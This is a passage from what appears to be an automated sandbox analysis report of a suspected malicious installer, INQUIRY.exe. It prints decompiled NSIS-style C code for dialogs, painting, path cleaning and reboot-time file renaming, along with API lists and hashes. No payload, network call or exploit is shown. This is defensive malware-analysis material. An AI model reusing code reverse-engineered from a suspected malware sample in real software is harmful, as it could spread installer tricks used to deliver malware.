                          								SendMessageA( *0x423ea8, 0x10, 0, 0);
                          							}
                          							return 1;
                          						}
                          					}
                          					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                          						goto L25;
                          					} else {
                          						_t103 =  *0x41fc68; // 0x0
                          						_t25 = _t103 + 0x14; // 0x14
                          						_t112 = _t25;
                          						if(( *_t112 & 0x00000020) == 0) {
                          							goto L25;
                          						}
                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                          						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                          						E0040420A();
                          						goto L11;
                          					}
                          				}
                          				_t98 = _a16;
                          				_t113 =  *(_t98 + 0x30);
                          				if(_t113 < 0) {
                          					_t107 =  *0x42367c; // 0x5233c1
                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                          				}
                          				_t71 =  *0x423ed8; // 0x521d84
                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                          				_t114 = _t113 + _t71;
                          				_push(0x22);
                          				_a16 =  *_t114;
                          				_v12 = _v12 & 0x00000000;
                          				_t115 = _t114 + 1;
                          				_v16 = _t115;
                          				_v8 = E00403F4B;
                          				E00403E37(_a4);
                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                          				_push(0x23);
                          				E00403E37(_a4);
                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                          				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                          				_t99 = GetDlgItem(_a4, 0x3e8);
                          				E00403E6C(_t99);
                          				SendMessageA(_t99, 0x45b, 1, 0);
                          				_t85 =  *0x423eb0; // 0x51d818
                          				_t86 =  *(_t85 + 0x68);
                          				if(_t86 < 0) {
                          					_t86 = GetSysColor( ~_t86);
                          				}
                          				SendMessageA(_t99, 0x443, 0, _t86);
                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                          				 *0x41f45c =  *0x41f45c & 0x00000000;
                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                          				 *0x420478 =  *0x420478 & 0x00000000;
                          				return 0;
                          			}





















                          0x00403f8f
                          0x004040b5
                          0x00404111
                          0x00404115
                          0x004041ec
                          0x004041ee
                          0x004041ee
                          0x004041f4
                          0x004041f4
                          0x004041f7
                          0x00000000
                          0x004041fe
                          0x00404123
                          0x00404125
                          0x0040412f
                          0x0040413a
                          0x0040413d
                          0x00404140
                          0x0040414b
                          0x0040414e
                          0x00404155
                          0x00404163
                          0x0040417b
                          0x00404183
                          0x0040418e
                          0x0040419e
                          0x004041a0
                          0x004041a0
                          0x00404155
                          0x004041aa
                          0x00000000
                          0x004041b5
                          0x004041b9
                          0x004041ca
                          0x004041ca
                          0x004041d0
                          0x004041de
                          0x004041de
                          0x00000000
                          0x004041e2
                          0x004041aa
                          0x004040c0
                          0x00000000
                          0x004040d4
                          0x004040d4
                          0x004040da
                          0x004040da
                          0x004040e0
                          0x00000000
                          0x00000000
                          0x00404105
                          0x00404107
                          0x0040410c
                          0x00000000
                          0x0040410c
                          0x004040c0
                          0x00403f95
                          0x00403f98
                          0x00403f9d
                          0x00403f9f
                          0x00403fae
                          0x00403fae
                          0x00403fb0
                          0x00403fb5
                          0x00403fb8
                          0x00403fba
                          0x00403fbf
                          0x00403fc8
                          0x00403fce
                          0x00403fda
                          0x00403fdd
                          0x00403fe6
                          0x00403feb
                          0x00403fee
                          0x00403ff3
                          0x0040400a
                          0x00404011
                          0x00404024
                          0x00404027
                          0x0040403c
                          0x0040403e
                          0x00404043
                          0x00404048
                          0x0040404d
                          0x0040404d
                          0x0040405c
                          0x0040406b
                          0x0040406d
                          0x00404083
                          0x00404092
                          0x00404094
                          0x00000000

                          APIs
                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
                          • GetDlgItem.USER32 ref: 0040401E
                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                          • GetSysColor.USER32(?), ref: 0040404D
                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                          • lstrlenA.KERNEL32(?), ref: 00404075
                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                          • GetDlgItem.USER32 ref: 004040F5
                          • SendMessageA.USER32(00000000), ref: 004040F8
                          • GetDlgItem.USER32 ref: 00404123
                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                          • LoadCursorA.USER32 ref: 00404172
                          • SetCursor.USER32(00000000), ref: 0040417B
                          • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                          • LoadCursorA.USER32 ref: 0040419B
                          • SetCursor.USER32(00000000), ref: 0040419E
                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                          • String ID: @.B$N$open
                          • API String ID: 3615053054-3815657624
                          • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                          • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                          • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                          • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                          				struct tagLOGBRUSH _v16;
                          				struct tagRECT _v32;
                          				struct tagPAINTSTRUCT _v96;
                          				struct HDC__* _t70;
                          				struct HBRUSH__* _t87;
                          				struct HFONT__* _t94;
                          				long _t102;
                          				intOrPtr _t115;
                          				signed int _t126;
                          				struct HDC__* _t128;
                          				intOrPtr _t130;
                          
                          				if(_a8 == 0xf) {
                          					_t130 =  *0x423eb0; // 0x51d818
                          					_t70 = BeginPaint(_a4,  &_v96);
                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                          					_a8 = _t70;
                          					GetClientRect(_a4,  &_v32);
                          					_t126 = _v32.bottom;
                          					_v32.bottom = _v32.bottom & 0x00000000;
                          					while(_v32.top < _t126) {
                          						_a12 = _t126 - _v32.top;
                          						asm("cdq");
                          						asm("cdq");
                          						asm("cdq");
                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                          						_t87 = CreateBrushIndirect( &_v16);
                          						_v32.bottom = _v32.bottom + 4;
                          						_a16 = _t87;
                          						FillRect(_a8,  &_v32, _t87);
                          						DeleteObject(_a16);
                          						_v32.top = _v32.top + 4;
                          					}
                          					if( *(_t130 + 0x58) != 0xffffffff) {
                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                          						_a16 = _t94;
                          						if(_t94 != 0) {
                          							_t128 = _a8;
                          							_v32.left = 0x10;
                          							_v32.top = 8;
                          							SetBkMode(_t128, 1);
                          							SetTextColor(_t128,  *(_t130 + 0x58));
                          							_a8 = SelectObject(_t128, _a16);
                          							DrawTextA(_t128, "heifsmlbdxlebvytfzg Setup", 0xffffffff,  &_v32, 0x820);
                          							SelectObject(_t128, _a8);
                          							DeleteObject(_a16);
                          						}
                          					}
                          					EndPaint(_a4,  &_v96);
                          					return 0;
                          				}
                          				_t102 = _a16;
                          				if(_a8 == 0x46) {
                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                          					_t115 =  *0x423ea8; // 0x0
                          					 *((intOrPtr*)(_t102 + 4)) = _t115;
                          				}
                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                          			}














                          0x0040100a
                          0x00401039
                          0x00401047
                          0x0040104d
                          0x00401051
                          0x0040105b
                          0x00401061
                          0x00401064
                          0x004010f3
                          0x00401089
                          0x0040108c
                          0x004010a6
                          0x004010bd
                          0x004010cc
                          0x004010cf
                          0x004010d5
                          0x004010d9
                          0x004010e4
                          0x004010ed
                          0x004010ef
                          0x004010ef
                          0x00401100
                          0x00401105
                          0x0040110d
                          0x00401110
                          0x00401112
                          0x00401118
                          0x0040111f
                          0x00401126
                          0x00401130
                          0x00401142
                          0x00401156
                          0x00401160
                          0x00401165
                          0x00401165
                          0x00401110
                          0x0040116e
                          0x00000000
                          0x00401178
                          0x00401010
                          0x00401013
                          0x00401015
                          0x00401019
                          0x0040101f
                          0x0040101f
                          0x00000000

                          APIs
                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32 ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32 ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextA.USER32(00000000,heifsmlbdxlebvytfzg Setup,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F$heifsmlbdxlebvytfzg Setup
                          • API String ID: 941294808-3161167016
                          • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                          • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                          • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                          • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E004057D3() {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t15;
                          				long _t16;
                          				intOrPtr _t18;
                          				int _t20;
                          				void* _t28;
                          				long _t29;
                          				intOrPtr* _t37;
                          				int _t43;
                          				void* _t44;
                          				long _t47;
                          				CHAR* _t49;
                          				void* _t51;
                          				void* _t53;
                          				intOrPtr* _t54;
                          				void* _t55;
                          				void* _t56;
                          
                          				_t15 = E00405DA3(1);
                          				_t49 =  *(_t55 + 0x18);
                          				if(_t15 != 0) {
                          					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                          					if(_t20 != 0) {
                          						L16:
                          						 *0x423f30 =  *0x423f30 + 1;
                          						return _t20;
                          					}
                          				}
                          				 *0x422628 = 0x4c554e;
                          				if(_t49 == 0) {
                          					L5:
                          					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                          					if(_t16 != 0 && _t16 <= 0x400) {
                          						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                          						_t18 =  *0x423eb0; // 0x51d818
                          						_t56 = _t55 + 0x10;
                          						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
                          						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                          						_t53 = _t20;
                          						 *(_t56 + 0x14) = _t53;
                          						if(_t53 == 0xffffffff) {
                          							goto L16;
                          						}
                          						_t47 = GetFileSize(_t53, 0);
                          						_t7 = _t43 + 0xa; // 0xa
                          						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                          						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                          							L15:
                          							_t20 = CloseHandle(_t53);
                          							goto L16;
                          						} else {
                          							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                          								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                          								if(_t28 == 0) {
                          									L13:
                          									_t29 = _t47;
                          									L14:
                          									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                          									SetFilePointer(_t53, 0, 0, 0);
                          									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                          									GlobalFree(_t51);
                          									goto L15;
                          								}
                          								_t37 = _t28 + 1;
                          								_t44 = _t51 + _t47;
                          								_t54 = _t37;
                          								if(_t37 >= _t44) {
                          									L21:
                          									_t53 =  *(_t56 + 0x14);
                          									_t29 = _t37 - _t51;
                          									goto L14;
                          								} else {
                          									goto L20;
                          								}
                          								do {
                          									L20:
                          									 *((char*)(_t43 + _t54)) =  *_t54;
                          									_t54 = _t54 + 1;
                          								} while (_t54 < _t44);
                          								goto L21;
                          							}
                          							E00405A85(_t51 + _t47, "[Rename]\r\n");
                          							_t47 = _t47 + 0xa;
                          							goto L13;
                          						}
                          					}
                          				} else {
                          					CloseHandle(E0040575C(_t49, 0, 1));
                          					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                          					if(_t16 != 0 && _t16 <= 0x400) {
                          						goto L5;
                          					}
                          				}
                          				return _t16;
                          			}






















                          0x004057d9
                          0x004057e0
                          0x004057e4
                          0x004057ed
                          0x004057f1
                          0x00405930
                          0x00405930
                          0x00000000
                          0x00405930
                          0x004057f1
                          0x004057fd
                          0x00405813
                          0x0040583b
                          0x00405846
                          0x0040584a
                          0x0040586a
                          0x0040586c
                          0x00405871
                          0x0040587b
                          0x00405888
                          0x0040588d
                          0x00405892
                          0x00405896
                          0x00000000
                          0x00000000
                          0x004058a5
                          0x004058a7
                          0x004058b4
                          0x004058b8
                          0x00405929
                          0x0040592a
                          0x00000000
                          0x004058d4
                          0x004058e1
                          0x00405946
                          0x0040594d
                          0x004058f4
                          0x004058f4
                          0x004058f6
                          0x004058ff
                          0x0040590a
                          0x0040591c
                          0x00405923
                          0x00000000
                          0x00405923
                          0x0040594f
                          0x00405950
                          0x00405955
                          0x00405957
                          0x00405964
                          0x00405964
                          0x00405968
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405959
                          0x00405959
                          0x0040595c
                          0x0040595f
                          0x00405960
                          0x00000000
                          0x00405959
                          0x004058ec
                          0x004058f1
                          0x00000000
                          0x004058f1
                          0x004058b8
                          0x00405815
                          0x00405820
                          0x00405829
                          0x0040582d
                          0x00000000
                          0x00000000
                          0x0040582d
                          0x0040593a

                          APIs
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                          • GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
                          • GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
                          • wsprintfA.USER32 ref: 00405864
                          • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                          • GlobalFree.KERNEL32 ref: 00405923
                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                            • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                            • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                          • String ID: %s=%s$(&B$[Rename]
                          • API String ID: 3772915668-1834469719
                          • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                          • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                          • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                          • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405CE3(CHAR* _a4) {
                          				char _t5;
                          				char _t7;
                          				char* _t15;
                          				char* _t16;
                          				CHAR* _t17;
                          
                          				_t17 = _a4;
                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                          					_t17 =  &(_t17[4]);
                          				}
                          				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                          					_t17 =  &(_t17[2]);
                          				}
                          				_t5 =  *_t17;
                          				_t15 = _t17;
                          				_t16 = _t17;
                          				if(_t5 != 0) {
                          					do {
                          						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                          							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                          							_t16 = CharNextA(_t16);
                          						}
                          						_t17 = CharNextA(_t17);
                          						_t5 =  *_t17;
                          					} while (_t5 != 0);
                          				}
                          				 *_t16 =  *_t16 & 0x00000000;
                          				while(1) {
                          					_t16 = CharPrevA(_t15, _t16);
                          					_t7 =  *_t16;
                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                          						break;
                          					}
                          					 *_t16 =  *_t16 & 0x00000000;
                          					if(_t15 < _t16) {
                          						continue;
                          					}
                          					break;
                          				}
                          				return _t7;
                          			}








                          0x00405ce5
                          0x00405ced
                          0x00405d01
                          0x00405d01
                          0x00405d07
                          0x00405d14
                          0x00405d14
                          0x00405d15
                          0x00405d17
                          0x00405d1b
                          0x00405d1d
                          0x00405d26
                          0x00405d28
                          0x00405d42
                          0x00405d4a
                          0x00405d4a
                          0x00405d4f
                          0x00405d51
                          0x00405d53
                          0x00405d57
                          0x00405d58
                          0x00405d5b
                          0x00405d63
                          0x00405d65
                          0x00405d69
                          0x00000000
                          0x00000000
                          0x00405d6f
                          0x00405d74
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405d74
                          0x00405d79

                          APIs
                          • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                          • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                          • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                          • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\INQUIRY.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-1527370665
                          • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                          • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                          • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                          • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                          				struct tagLOGBRUSH _v16;
                          				long _t35;
                          				long _t37;
                          				void* _t40;
                          				long* _t49;
                          
                          				if(_a4 + 0xfffffecd > 5) {
                          					L15:
                          					return 0;
                          				}
                          				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                          				if(_t49 == 0) {
                          					goto L15;
                          				}
                          				_t35 =  *_t49;
                          				if((_t49[5] & 0x00000002) != 0) {
                          					_t35 = GetSysColor(_t35);
                          				}
                          				if((_t49[5] & 0x00000001) != 0) {
                          					SetTextColor(_a8, _t35);
                          				}
                          				SetBkMode(_a8, _t49[4]);
                          				_t37 = _t49[1];
                          				_v16.lbColor = _t37;
                          				if((_t49[5] & 0x00000008) != 0) {
                          					_t37 = GetSysColor(_t37);
                          					_v16.lbColor = _t37;
                          				}
                          				if((_t49[5] & 0x00000004) != 0) {
                          					SetBkColor(_a8, _t37);
                          				}
                          				if((_t49[5] & 0x00000010) != 0) {
                          					_v16.lbStyle = _t49[2];
                          					_t40 = _t49[3];
                          					if(_t40 != 0) {
                          						DeleteObject(_t40);
                          					}
                          					_t49[3] = CreateBrushIndirect( &_v16);
                          				}
                          				return _t49[3];
                          			}








                          0x00403eb0
                          0x00403f44
                          0x00000000
                          0x00403f44
                          0x00403ec1
                          0x00403ec5
                          0x00000000
                          0x00000000
                          0x00403ecb
                          0x00403ed4
                          0x00403ed7
                          0x00403ed7
                          0x00403edd
                          0x00403ee3
                          0x00403ee3
                          0x00403eef
                          0x00403ef5
                          0x00403efc
                          0x00403eff
                          0x00403f02
                          0x00403f04
                          0x00403f04
                          0x00403f0c
                          0x00403f12
                          0x00403f12
                          0x00403f1c
                          0x00403f21
                          0x00403f24
                          0x00403f29
                          0x00403f2c
                          0x00403f2c
                          0x00403f3c
                          0x00403f3c
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                          • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                          • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                          • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E0040266E(struct _OVERLAPPED* __ebx) {
                          				void* _t27;
                          				long _t32;
                          				struct _OVERLAPPED* _t47;
                          				void* _t51;
                          				void* _t53;
                          				void* _t56;
                          				void* _t57;
                          				void* _t58;
                          
                          				_t47 = __ebx;
                          				 *(_t58 - 8) = 0xfffffd66;
                          				_t52 = E004029E8(0xfffffff0);
                          				 *(_t58 - 0x44) = _t24;
                          				if(E004055E5(_t52) == 0) {
                          					E004029E8(0xffffffed);
                          				}
                          				E0040573D(_t52);
                          				_t27 = E0040575C(_t52, 0x40000000, 2);
                          				 *(_t58 + 8) = _t27;
                          				if(_t27 != 0xffffffff) {
                          					_t32 =  *0x423eb4; // 0xb600
                          					 *(_t58 - 0x2c) = _t32;
                          					_t51 = GlobalAlloc(0x40, _t32);
                          					if(_t51 != _t47) {
                          						E004031DA(_t47);
                          						E004031A8(_t51,  *(_t58 - 0x2c));
                          						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                          						 *(_t58 - 0x30) = _t56;
                          						if(_t56 != _t47) {
                          							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                          							while( *_t56 != _t47) {
                          								_t49 =  *_t56;
                          								_t57 = _t56 + 8;
                          								 *(_t58 - 0x38) =  *_t56;
                          								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                          								_t56 = _t57 +  *(_t58 - 0x38);
                          							}
                          							GlobalFree( *(_t58 - 0x30));
                          						}
                          						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                          						GlobalFree(_t51);
                          						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                          					}
                          					CloseHandle( *(_t58 + 8));
                          				}
                          				_t53 = 0xfffffff3;
                          				if( *(_t58 - 8) < _t47) {
                          					_t53 = 0xffffffef;
                          					DeleteFileA( *(_t58 - 0x44));
                          					 *((intOrPtr*)(_t58 - 4)) = 1;
                          				}
                          				_push(_t53);
                          				E00401423();
